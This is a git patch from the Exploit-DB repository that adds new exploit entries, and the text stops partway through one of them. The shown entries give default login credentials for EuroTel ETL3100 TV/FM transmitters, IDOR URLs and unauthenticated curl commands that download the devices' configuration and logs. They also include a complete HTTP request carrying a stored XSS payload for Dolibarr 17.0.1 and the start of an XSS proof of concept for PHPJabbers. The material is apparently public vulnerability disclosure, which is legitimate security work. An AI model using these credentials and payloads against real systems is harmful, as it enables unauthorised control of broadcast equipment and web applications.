From e07f33f24da6d847fdd5bba3f24f6f01eeecd446 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Tue, 22 Aug 2023 00:16:22 +0000 Subject: [PATCH] DB: 2023-08-22 17 changes to exploits/shellcodes/ghdb EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR) EuroTel ETL3100 - Transmitter Default Credentials EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download Color Prediction Game v1.0 - SQL Injection Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated) Dolibarr Version 17.0.1 - Stored XSS Global - Multi School Management System Express v1.0- SQL Injection OVOO Movie Portal CMS v3.3.3 - SQL Injection PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities Taskhub CRM Tool 2.8.6 - SQL Injection Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions TSPlus 16.0.0.0 - Remote Work Insecure Credential storage TSplus 16.0.0.0 - Remote Work Insecure Files and Folders TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions Linux/x64 - memfd_create ELF loader Shellcode (170 bytes) --- exploits/hardware/remote/51684.txt | 43 +++++++++ exploits/hardware/remote/51685.txt | 54 +++++++++++ exploits/hardware/remote/51686.txt | 45 +++++++++ exploits/php/webapps/51683.txt | 36 +++++++ exploits/php/webapps/51687.txt | 31 ++++++ exploits/php/webapps/51688.txt | 19 ++++ exploits/php/webapps/51689.txt | 53 +++++++++++ exploits/php/webapps/51690.txt | 60 ++++++++++++ exploits/php/webapps/51691.txt | 37 ++++++++ exploits/php/webapps/51692.txt | 37 ++++++++ exploits/windows/local/51682.txt | 42 ++++++++ exploits/windows/remote/51679.txt | 101 ++++++++++++++++++++ exploits/windows/remote/51680.txt | 103 ++++++++++++++++++++ exploits/windows/remote/51681.txt | 45 +++++++++ files_exploits.csv | 14 +++ files_shellcodes.csv | 1 + shellcodes/linux/51693.asm | 148 +++++++++++++++++++++++++++++ 17 files changed, 869 insertions(+) create mode 100644 exploits/hardware/remote/51684.txt create mode 100644 exploits/hardware/remote/51685.txt create mode 100644 exploits/hardware/remote/51686.txt create mode 100644 exploits/php/webapps/51683.txt create mode 100644 exploits/php/webapps/51687.txt create mode 100644 exploits/php/webapps/51688.txt create mode 100644 exploits/php/webapps/51689.txt create mode 100644 exploits/php/webapps/51690.txt create mode 100644 exploits/php/webapps/51691.txt create mode 100644 exploits/php/webapps/51692.txt create mode 100644 exploits/windows/local/51682.txt create mode 100644 exploits/windows/remote/51679.txt create mode 100644 exploits/windows/remote/51680.txt create mode 100644 exploits/windows/remote/51681.txt create mode 100644 shellcodes/linux/51693.asm diff --git a/exploits/hardware/remote/51684.txt b/exploits/hardware/remote/51684.txt new file mode 100644 index 000000000..b985059ba --- /dev/null +++ b/exploits/hardware/remote/51684.txt @@ -0,0 +1,43 @@ +#Exploit Title: EuroTel ETL3100 Transmitter Default Credentials +# Exploit Author: LiquidWorm +Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L +Product web page: https://www.eurotel.it | https://www.siel.fm +Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter) + v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter) + + +Summary: RF Technology For Television Broadcasting Applications. +The Series ETL3100 Radio Transmitter provides all the necessary +features defined by the FM and DAB standards. Two bands are provided +to easily complain with analog and digital DAB standard. The Series +ETL3100 Television Transmitter provides all the necessary features +defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as +well as the analog TV standards. Three band are provided to easily +complain with all standard channels, and switch softly from analog-TV +'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission. + +Desc: The TV and FM transmitter uses a weak set of default administrative +credentials that can be guessed in remote password attacks and gain full +control of the system. + +Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3) + lighttpd/1.4.26 + PHP/5.4.3 + Xilinx Virtex Machine + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5782 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php + + +29.04.2023 + +-- + + +Using Username "user" and Password "etl3100rt1234" the operator will enter in the WEB interface in a read-only mode. +Using Username "operator" and Password "2euro21234" the operator will be able also to modify some parameters in the WEB pages. \ No newline at end of file diff --git a/exploits/hardware/remote/51685.txt b/exploits/hardware/remote/51685.txt new file mode 100644 index 000000000..220ae747c --- /dev/null +++ b/exploits/hardware/remote/51685.txt @@ -0,0 +1,54 @@ +# Exploit Title: EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR) +# Exploit Author: LiquidWorm + +Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L +Product web page: https://www.eurotel.it | https://www.siel.fm +Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter) + v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter) + + +Summary: RF Technology For Television Broadcasting Applications. +The Series ETL3100 Radio Transmitter provides all the necessary +features defined by the FM and DAB standards. Two bands are provided +to easily complain with analog and digital DAB standard. The Series +ETL3100 Television Transmitter provides all the necessary features +defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as +well as the analog TV standards. Three band are provided to easily +complain with all standard channels, and switch softly from analog-TV +'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission. + +Desc: The application is vulnerable to insecure direct object references +that occur when the application provides direct access to objects based +on user-supplied input. As a result of this vulnerability attackers can +bypass authorization and access the hidden resources on the system and +execute privileged functionalities. + +Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3) + lighttpd/1.4.26 + PHP/5.4.3 + Xilinx Virtex Machine + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5783 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5783.php + + +29.04.2023 + +-- + + +See URL: + +TARGET/exciter.php?page=0 +TARGET/exciter.php?page=1 +TARGET/exciter.php?page=2 +... +... +TARGET/exciter.php?page=29 +TARGET/exciter.php?page=30 +TARGET/exciter.php?page=31 \ No newline at end of file diff --git a/exploits/hardware/remote/51686.txt b/exploits/hardware/remote/51686.txt new file mode 100644 index 000000000..1d161c7b6 --- /dev/null +++ b/exploits/hardware/remote/51686.txt @@ -0,0 +1,45 @@ +# Exploit Title: EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download +# Exploit Author: LiquidWorm + +Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L +Product web page: https://www.eurotel.it | https://www.siel.fm +Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter) + v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter) + + +Summary: RF Technology For Television Broadcasting Applications. +The Series ETL3100 Radio Transmitter provides all the necessary +features defined by the FM and DAB standards. Two bands are provided +to easily complain with analog and digital DAB standard. The Series +ETL3100 Television Transmitter provides all the necessary features +defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as +well as the analog TV standards. Three band are provided to easily +complain with all standard channels, and switch softly from analog-TV +'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission. + +Desc: The TV and FM transmitter suffers from an unauthenticated +configuration and log download vulnerability. This will enable +the attacker to disclose sensitive information and help him in +authentication bypass, privilege escalation and full system access. + +Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3) + lighttpd/1.4.26 + PHP/5.4.3 + Xilinx Virtex Machine + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5784 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5784.php + + +29.04.2023 + +-- + + +$ curl http://192.168.2.166/cfg_download.php -o config.tgz +$ curl http://192.168.2.166/exciter/log_download.php -o log.tar.gz \ No newline at end of file diff --git a/exploits/php/webapps/51683.txt b/exploits/php/webapps/51683.txt new file mode 100644 index 000000000..daf87b94a --- /dev/null +++ b/exploits/php/webapps/51683.txt @@ -0,0 +1,36 @@ +# Exploit Title: Dolibarr Version 17.0.1 - Stored XSS +# Dork: +# Date: 2023-08-09 +# Exploit Author: Furkan Karaarslan +# Category : Webapps +# Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php +# Version: 17.0.1 (REQUIRED) +# Tested on: Windows/Linux +# CVE : + +----------------------------------------------------------------------------- +Requests + +POST /dolibarr-17.0.1/htdocs/user/note.php HTTP/1.1 +Host: 127.0.0.1 +Content-Length: 599 +Cache-Control: max-age=0 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "" +Upgrade-Insecure-Requests: 1 +Origin: http://127.0.0.1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php?action=editnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1 +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: 5c8ccd93504819395bd9eb83add769eb=g6sujc3ss8cj53cvk84qv0jgol; f758a1cd0925196cd7746824e3df122b=u04rsmdqgrdpr2kduo49gl0rmh; DOLSESSID_18109f368bbc82f2433d1d6c639db71bb97e2bd1=sud22bsu9sbqqc4bgcloki2eht +Connection: close + +token=4b1479ad024e82d298b395bfab9b1916&action=setnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1¬e_public=%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3Bborder%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E&modify=De%C4%9Fi%C5%9Ftir \ No newline at end of file diff --git a/exploits/php/webapps/51687.txt b/exploits/php/webapps/51687.txt new file mode 100644 index 000000000..fc0c1fede --- /dev/null +++ b/exploits/php/webapps/51687.txt @@ -0,0 +1,31 @@ +# Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities +# Date: 09/08/2023 +# Exploit Author: Kerimcan Ozturk +# Vendor Homepage: https://www.phpjabbers.com/ +# Software Link: https://www.phpjabbers.com/business-directory-script/ +# Version: 3.2 +# Tested on: Windows 10 Pro +## Description + +Technical Detail / POC +========================== +Login Account +Go to Property Page ( +https://website/index.php?controller=pjAdminListings&action=pjActionUpdate) +Edit Any Property ( +https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57 +) + +[1] Cross-Site Scripting (XSS) + +Request: +https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id= +"